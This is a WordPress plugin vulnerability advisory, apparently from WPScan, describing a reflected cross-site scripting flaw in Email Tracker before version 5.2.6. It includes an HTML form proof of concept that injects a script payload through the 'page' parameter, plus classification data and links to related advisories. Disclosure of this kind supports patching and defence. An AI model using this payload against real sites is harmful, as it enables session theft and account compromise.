Email Tracker < 5.2.6 – Reflected Cross-Site Scripting | Plugin Vulnerabilities

Description

The plugin does not escape user input before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=emtr_email_list" method="POST">
      <input type="hidden" name="page" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Fixed in 5.2.6

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

cbf54b93-7a46-4a83-9df9-9c2b92d7b7b9

Timeline

Publicly Published

2021-11-03 (about 4 years ago)

Added

2021-11-03 (about 4 years ago)

Last Updated

2021-11-03 (about 4 years ago)

Other

Published

Title

Published

2014-08-01

Title

ZooEffect 1.08 - HTTP Referer Reflected XSS

Published

2024-04-15

Title

Easy Textillate <= 2.02 - Authenticated(Contributor+) Stored Cross-Site Scripting

Published

2024-05-06

Title

Yoast SEO < 22.6 - Reflected Cross-Site Scripting

Published

2024-10-14

Title

Events Addon for Elementor < 2.2.1 - Contributor+ Stored XSS

Published

2024-10-11

Title

ImagePress - Image Gallery < 1.3.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via Plugin Settings